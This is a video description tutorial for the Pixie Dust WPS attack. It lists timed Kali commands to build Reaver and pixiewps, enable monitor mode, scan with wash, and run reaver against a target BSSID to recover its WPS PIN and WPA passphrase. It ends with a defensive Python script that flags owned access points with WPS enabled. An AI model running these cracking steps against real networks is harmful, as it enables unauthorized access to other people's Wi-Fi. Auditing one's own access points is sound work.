Description: This video will show you how to get started using PixieWPS.
In the summer of 2014, Dominique Bongard discovered what he called the "Pixie Dust" attack. This attack only works against the default WPS implementation of several wireless chip makers: Ralink, Realtek, and Broadcom. The attack focuses on a lack of randomization when generating the E-S1 and E-S2 "secret" nonces. If the attacker can figure out those two nonces, they can crack the PIN in anywhere from 1 second on some devices to about 30 minutes. A tool named pixiewps has been developed, and a new version of Reaver has been developed to automate the process.
You will need the following:
Kali Linux: kali.org
Compatible Wireless Card: http://goo.gl/PfNJmD or http://goo.gl/wngqSc or http://goo.gl/xFD8lI
0:30 Command 1. apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
0:58 Command 2. git clone https://github.com/t6x/reaver-wps-fork-t6x.git
1:08 Command 3. cd reaver-wps-fork-t6x/src
1:19 Command 4. ./configure
1:29 Command 5. make
1:43 Command 6. make install
2:08 Command 7. airmon-ng
Finds what wireless cards are connected.
2:26 Command 8. airmon-ng start wlan0
Replace wlan0 with your wireless card; it might be wlan0 or wlan1 if more than one wireless card is connected.
2:51 Command 9. wash -i wlan0mon
Replace wlan0mon with whichever interface showed up under airmon-ng; it might be wlan0mon or wlan1mon. If mon0 shows, you have the wrong aircrack-ng installed.
3:14 Command 10. reaver
3:28 Command 11. reaver -i wlan0mon -b BSSIDHERE -c Channel#Here -vvv -K 1
Replace wlan0mon with whatever showed up under airmon-ng, replace BSSIDHERE with your target BSSID, and replace Channel#Here with the wireless network's channel.
-K 1 Command: Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom & Realtek).
-f Command: If -K 1 fails, -f will brute-force the whole keyspace to get the WPS PIN.
4:24 PixieWPS gets the WPS PIN and WPA wireless security passphrase of the target network.
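For checking your own access points against the exposure described above, here is an added example (not from the video or the Reaver project). It parses `wash` output and reports owned APs that advertise WPS, ranking those whose vendor matches the chip makers named above. The column layout, the vendor abbreviations, the sample rows and the `OWNED` inventory are assumptions constructed for illustration.

```python
import re

# Chip makers the page names as affected. Matching is by prefix because wash is
# assumed to abbreviate vendor names (e.g. "RalinkTe", "RealtekS").
AFFECTED_VENDORS = ("ralink", "realtek", "broadcom")

# Constructed sample. Assumed column layout: BSSID Ch dBm WPS Lck Vendor ESSID.
# wash is assumed to list only APs that advertise WPS, so every row has WPS on.
SAMPLE_WASH = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
02:00:00:AA:00:01    1  -41  2.0  No   RalinkTe  office-main
02:00:00:AA:00:02    6  -57  2.0  Yes  Broadcom  office-guest
02:00:00:AA:00:03   11  -63  1.0  No   AtherosC  lab ap
02:00:00:BB:00:09   11  -70  2.0  No   RealtekS  not-ours
"""

# Hypothetical inventory of BSSIDs you administer; anything else is ignored.
OWNED = {"02:00:00:AA:00:01", "02:00:00:AA:00:02", "02:00:00:AA:00:03"}

ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<ch>\d+)\s+"
    r"(?P<dbm>-?\d+)\s+(?P<wps>\d\.\d)\s+(?P<lck>Yes|No)\s+"
    r"(?P<vendor>\S+)\s+(?P<essid>.*)$"
)

def audit(wash_text, owned):
    """Return (bssid, essid, priority) for each owned AP that advertises WPS."""
    findings = []
    for line in wash_text.splitlines():
        m = ROW.match(line.strip())  # header and separator lines do not match
        if not m or m["bssid"].upper() not in owned:
            continue
        affected = m["vendor"].lower().startswith(AFFECTED_VENDORS)
        if affected and m["lck"] == "No":
            priority = "high"    # named chip maker, WPS PIN not locked
        elif affected:
            priority = "medium"  # named chip maker, WPS currently locked
        else:
            priority = "review"  # WPS on; vendor not among those named
        findings.append((m["bssid"].upper(), m["essid"].strip(), priority))
    return findings

if __name__ == "__main__":
    for bssid, essid, priority in audit(SAMPLE_WASH, OWNED):
        print(f"{priority:<7} {bssid}  {essid}  -> disable WPS PIN on this AP")
```

A vendor match only means the AP uses a chip from a maker the description names, not that its firmware is affected; turning WPS off on every listed AP removes the exposure either way.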